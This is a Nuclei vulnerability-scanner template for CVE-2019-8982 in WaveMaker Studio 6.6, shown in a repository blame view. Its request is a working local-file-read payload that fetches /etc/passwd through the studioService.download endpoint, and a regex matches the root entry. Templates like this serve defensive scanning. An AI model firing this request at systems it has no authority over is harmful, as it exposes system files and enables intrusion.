nuclei-templates/cves/2019/CVE-2019-8982.yaml

23 lines
700 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-8982
info:
name: Wavemaker Studio 6.6 LFI/SSRF
author: madrobot
2020-05-25 07:49:06 +00:00
severity: high
2021-03-30 12:01:26 +00:00
description: com/wavemaker/studio/StudioService.java in WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value, leading to disclosure of local files and SSRF.
reference: https://www.exploit-db.com/exploits/45158
tags: cve,cve2019,wavemaker,lfi,ssrf
requests:
- method: GET
path:
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
- type: regex
regex:
2020-05-25 07:49:06 +00:00
- "root:[x*]:0:0:"
part: body